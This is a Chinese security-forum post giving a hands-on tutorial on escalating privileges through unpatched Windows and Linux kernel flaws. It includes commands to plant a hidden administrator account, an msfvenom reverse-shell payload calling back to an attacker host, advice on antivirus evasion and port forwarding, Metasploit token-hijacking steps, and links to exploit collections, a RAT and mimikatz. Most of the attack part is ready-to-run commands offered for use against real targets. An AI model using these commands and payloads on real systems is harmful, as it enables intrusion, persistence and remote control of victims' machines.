安全矩阵

 找回密码
 立即注册
搜索
查看: 2724|回复: 0

利用系统溢出漏洞提权

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-12-19 14:33:39 | 显示全部楼层 |阅读模式
原文链接:利用系统溢出漏洞提权

溢出漏洞提权是利用目标操作系统层漏洞进行权限提升,通常步骤是拿到shell后获取目标机器的补丁信息,通过目标的补丁情况获取相对应的漏洞,进行提权
一、Windows 溢出提权

#Windows查看补丁信息,或者直接systeminfowmic qfe get Caption,description,hotfixid,installedon


1.提权辅助工具windows-exploit-suggester

项目地址:https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Windows-Exploit-Suggester通过下载微软公开漏洞库报道到本地xls文件,然后根据操作系统版本,与systeminfo的信息进行对比对从而判断目标可能存在的溢出漏洞,需要注意的是并非所有输出的漏洞都可以利用,实践出真知。使用方法如下:

# 更新漏洞库,更新完成后会在统计目录生成包含截至目前windows所有漏洞信息python2 windows-exploit-suggester.py --update在目标主机上执行命令systeminfo并将输出的结果保存为一个txt文件。

# 对比补丁情况得到目标可能存在的漏洞
python2 windows-exploit-suggester.py --database 2020-05-28-mssb.xls  --system systeminfo.txt
根据返回的结果和提供的EXP地址进行漏洞利用完成提权。
Windows提权漏洞利用工具

项目地址:https://github.com/SecWiki/windows-kernel-exploits/
该项目集成了大部分windows溢出漏洞提权的EXP,可直接利用。

一般来说每个版本的服务都有成功高且稳定的漏洞,遇见这些版本的服务器在没有打补丁的情况下优先使用对应的漏洞提权:
Windows2003:pr、巴西烤肉、2018-8020
Windows2008:利用 ms16-075劫持token(烂土豆)
Windows 2012/2016:ms18-8120例:PR提权

拿到shell后上传cmd.exe和pr.exe,在菜刀终端窗口输入命令进行提权,如果目标不允许上传exe文件,这里也可以上传其他的格式。有Windows识别的是文件PE结构,所以并不影响执行:

C:\inetpub\target\uploadlabs\upload\pr.exe "whoami"
回显system,提权成功

利用返回的system权限创建账号:

C:\Inetpub\wwwroot\8099\pr.exe "net user xy 123 /add && net localgroup administrators xy /add"
提权成功:

Linux 溢出提权

uname -r#查看内核版本,找对应漏洞


项目地址:https://github.com/SecWiki/linux-kernel-exploits/
根据内核版本找对应的漏洞


MSF提权

MSF的后渗透模块十分强大,个人以为利用MSF提权相对于一个EXP一个EXP的去打目标主机要显得温柔很多。MSF提权的大致步骤如下:
1.生成payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.5 lport=1122 -f exe > /root/a.exe

2.端口转发

实战情况下MSF处于本地内网,目标的会话无法直接反弹到本地。利用ngrock等工具实现端口转发,ngrock的使用方法传送门:MSF配合Ngrock穿透内网

3.payload做免杀

如果目标主机存在较强的WAF,无法直接建立会话,那么就需要对payload进行免杀。免杀的方法很多,但是强大的不多。推荐shellter:MSF配合shellter实现360免杀

4.建立监听

  1. use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp
  3. set lhost 192.168.1.5
  4. set lport 1122
  5. run
复制代码



6.拿到会话开始提权

  1. #查看权限
  2. getuid
  3. #尝试自动提权,一般都没法成功
  4. getsystem
  5. #挂起会话
  6. background
  7. #查看会话列表
  8. sessions -l
复制代码


MSF漏洞发现模块
  1. #查找补丁缺失模块,会返回一些漏洞可直接利用
  2. use post/windows/gather/enum_patches
  3. set session x
  4. run
  5. #这个模块慢一点,但是相对上面那个更稳定
  6. use post/multi/recon/local_exploit_suggester
  7. set session x
  8. run
复制代码



从返回的漏洞列表寻找最合适的漏洞进行利用,例如:
  1. use exploit/windows/local/ms15_051_client_copy_image
  2. set session 3
  3. run
复制代码


返回高权限会话,提权成功:

MSF烂土豆劫持token提权(ms16_075)
  1. session -i 3
  2. #调用session
  3. upload /root/potato.exe
  4. #上传potato
  5. dir
  6. use incognito
  7. #调用token劫持模块
  8. list_tokens -u
  9. #查看可用的session
  10. execute -cH -f ./potato.exe
  11. #执行(没返回就多搞几次)
  12. impersonate_token "NT AUTHORITY\SYSTEM"
  13. #导入权限,成功提权。会返回一个system权限的会话
  14. #如果杀软对potato.exe 下手,只有改后缀或者找免杀版本
复制代码

  1. # 常见漏洞EXP网站
  2. https://exploit-db.com
  3. https://packetstormsecurity.com
  4. https://packetstormsecurity.com/search/?q=ms15-057
  5. https://www.securityfocus.com/
  6. https://www.securityfocus.com/bid
  7. http://1337day.com
  8. http://0day.today
  9. http://seclists.org/fulldisclosure
  10. http://exploitsearch.net
  11. http://www.securiteam.com
  12. http://metasploit.com/modules
  13. http://securityreason.com
  14. https://cxsecurity.com/exploit
  15. http://securitytracker.com
复制代码

  1. #提权项目合集:
  2. https://github.com/lyshark/Windows-exploits
  3. https://github.com/SecWiki/windows-kernel-exploits
  4. https://github.com/klsfct/getshell
  5. https://github.com/ianxtianxt/win-exp-
  6. https://github.com/uknowsec/SweetPotato
  7. https://github.com/uknowsec/getSystem
  8. https://github.com/s0wr0b1ndef/Linux-Kernel-Exploites
复制代码



  1. #其他
  2. https://github.com/quasar/QuasarRAT/releases
  3. https://github.com/gentilkiwi/mimikatz/releases
复制代码




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-23 08:03 , Processed in 0.016128 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表